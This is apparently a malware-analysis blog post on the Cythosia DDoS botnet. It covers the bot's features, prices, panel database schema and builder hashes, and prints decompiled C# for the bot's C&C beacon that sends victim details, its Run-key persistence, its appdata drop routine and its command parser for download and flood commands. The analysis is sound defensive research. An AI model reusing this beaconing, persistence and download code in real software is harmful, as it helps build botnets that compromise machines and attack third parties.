An overview of Cythosia DDoS Bot

Cythosia v2 is a DDoS Botnet System has been published in BlackMarket Forums a while ago, we decided to publish an article shared on my private blog.
Here at UIC R.E. Academy we strongly believe in sharing knowledge, for this reason we decided to publish articles, also not up to date, that could come handy/teach something to our readers.

Cythosia

Summary of Features
Here a quick view of features offered by Cythosia.

– Main Functions:

+ Download & Execute
+ Update

– Distributed Denial of Service Functions

+ Syn
~ 20 Bots can kill little Sites
~ Customizeable Port & Strength(Http, Sql, Gameserver)
+ UDP
~ Perform attacks on homeconnections
~ Highly customizeable
+ HTTP
~ Multithreaded GET Requests – Generates Traffic as hell
~ Keeps GET Requests open

– Socks5 Proxy

+ Opens Port with UPnP if router supports it
+ Redirects all TCP requests multithreaded -> very good speed
+ Configureable Username and Password

– Control Panel

+ Nice looking Ajax Panel
+ Hardcoded Password -> secure
+ Taskmanagement System
+ Export Online SOCKS5 LISTs

Pricing

> Binary + Webpanel: 120 Ukash / 140 PSC
> Binary + Webpanel + Control Panel install service: 140 Ukash / 160 PSC
> Binary + Webpanel + VPS install Service: 180 Ukash / 200 PSC

Analysis

Builder and produced Binary are written in .NET and Webpanel is the usual PHP + MySQL combo.
Here a quick view of Webpanel files:

wp_1

Inside Admin:

wp_2

From .sql inspection we can see that created tables are:

  • hydra_socks
  • hydra_tasks
  • hydra_task_done
  • hydra_victims

The most significant table is the last one, here information collected about Infected Victims:

CREATE TABLE IF NOT EXISTS `hydra_victims` (
  `ID` int(12) NOT NULL AUTO_INCREMENT,
  `PCName` tinytext NOT NULL,
  `BotVersion` tinytext NOT NULL,
  `InstTime` tinytext NOT NULL,
  `ConTime` tinytext NOT NULL,
  `Country` tinytext NOT NULL,
  `WinVersion` tinytext NOT NULL,
  `HWID` tinytext NOT NULL,
  `IP` tinytext NOT NULL,
  `taskID` int(11) NOT NULL,
  KEY `ID` (`ID`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;

Binary Overview

The builder is called CythBuilder.exe written in .NET and has the following hashes:

MD5: 60252B0565A60ABFEF9DEC2E20DD9629
SHA1: 7DB54CE54F5ECB59253F59CFF9DE9CCD2B91D516

The binary is Obfuscated with Eazfuscator, a pretty common .NET Obfuscator:

cyth_bldr

It’s pretty useless to be involved into Builder Deobfuscation, a pretty trivial task, SimpleAssemblyExplorer has some problems due to the too recent version of the builder but Obfuscation can be easily mimed by hand.

Let’s see the produced bot.

Bot Reverse Engineering

The builded executable is again in .NET but this time no Obfuscation occour, pretty useless to determine hashes due to the presence of user defined hardcoded values, more significative is to compute CTP Hash that provides a Similarity indication.

bot_1

Thanks to names, Modules are self-explanatory, time to follow the code from the Main() that is placed into HarvesterSocksBot:

bot_2

The Configuration entry contains a set of hardcoded values that are essentially constituted by indications given into the builder:

using System;
namespace HarvesterSocksBot
{
    internal class Configuration
    {
        public static string Domain = "Domain";
        public static int Interval = 900000;
        public static string IpScript = Configuration.Domain + "ip.php";
        public static string WebPanel = Configuration.Domain + "connect.php";
        public static string SocksPanel = Configuration.Domain + "socks5.php";
        public static string Version = "1.0.6 [beta] [23-03-2011]";
        public static string Mutex = "Mutex-AAAA";
        public static string SocksUser = "Sock-Username";
        public static string SocksPW = "Sock-Password";
        public static string TargetFolder = "Target Folder";
        public static string DropName = "Drop Name.exe";
        public static string Startup = "Startup Entry";
    }
}

The main:

// HarvesterSocksBot.Program
private static void Main(string[] args)
{
    new InstanceUnique(Configuration.Mutex);
    Install install = new Install();
    install.StartInstall();
    string b = string.Empty;
    new Thread(new ThreadStart(StartClass.StartSocks)).Start();
    while (true)
    {
        string parameters = string.Concat(new string[]
        {
            "pcname=", 
            Environment.MachineName, 
            "&botver=", 
            Configuration.Version, 
            "&country=", 
            CollectInformations.Location().ToLower(), 
            "&winver=", 
            CollectInformations.getOS(), 
            "&hwid=", 
            CollectInformations.getUniqueID(), 
            "&ip=", 
            CollectInformations.LocalIP()
        });
        string text = Program.HttpPost(Configuration.WebPanel, parameters);
        if (text.Length != 0 && text != b)
        {
            Program.StopDdos();
            Program.ParseCommand(text);
            b = text;
        }
        Thread.Sleep(Configuration.Interval);
    }
}

First operation is bot installation, whose code is contained in HarvesterSocksBot.Startup, the most significative piece of code is given by StartUPRegistery():

public void StartUPRegistery()
{
    try
    {
        if (Install.IsUserAdministrator())
        {
            RegistryKey registryKey = Registry.LocalMachine.CreateSubKey("Software\\
            Microsoft\\Windows\\CurrentVersion\\Run");
            registryKey.SetValue(Configuration.Startup, this.DEST_PATH);
        }
        else
        {
            RegistryKey registryKey2 = Registry.CurrentUser.CreateSubKey("Software
             \\Microsoft\\Windows\\CurrentVersion\\Run");
            registryKey2.SetValue(Configuration.Startup, this.DEST_PATH);
        }
    }
    catch
    {
    }
}

That places an entry into CurrentVersion\Run to ensure bot survival on reboot, but where the executable is placed? for that purpose there is Drop() function:

public void Drop()
        {
            try
            {
                if (!System.IO.Directory.Exists(System.Environment. 
GetEnvironmentVariable("appdata") + "/" + Configuration.TargetFolder))
                {
                    System.IO.Directory.CreateDirectory(System.Environment.
          GetEnvironmentVariable("appdata") + "/" + Configuration.TargetFolder);
                }
                if (!System.IO.File.Exists(this.DEST_PATH))
                {
                    System.IO.File.Copy(this.SOURCE_PATH, this.DEST_PATH, true);
                    Process.Start(this.DEST_PATH);
                    System.Environment.Exit(0);
                }
            }
            catch
            {
            }
        }

Bot is dropped on user’s appdata folder. Let’s land back to the Main(), after installation a new Thread is started and successively a string is assembled, from the tokens became clear that this is the Classical HTTP request sent by the bot with victim informations:

pcname= – &botver= – &country= – &winver= – &hwid= – &ip=

String is successively sent to the C&C via HttpPost() function, the return value is a reply from the malicious server that is parsed with ParseCommand(string Command) function:

// HarvesterSocksBot.Program
private static void ParseCommand(string Command)
{
    string[] array = Command.Split(new char[]
    {
        '*'
    });
    if (Command.StartsWith("!dl"))
    {
        try
        {
            Program.StopDdos();
            Download.Start(array[1]);
        }
        catch
        {
        }
    }

Function is a bit long, so here a quick resume of supported commands:

  • !dl -> Download
  • !update -> Update Bot
  • !syn -> Syn Flood
  • !udp -> UDP Flood
  • !http -> HTTP Flood

There are three supported DoS modes plus bot update and download functionality, to each command correspond a proper function, located in HarvesterSocksBot.Floods.

With a bit of googling you can find cythosia sources too.

Additional information:

http://www.xylibox.com/2012/08/cythosia-botnet-vnloader.html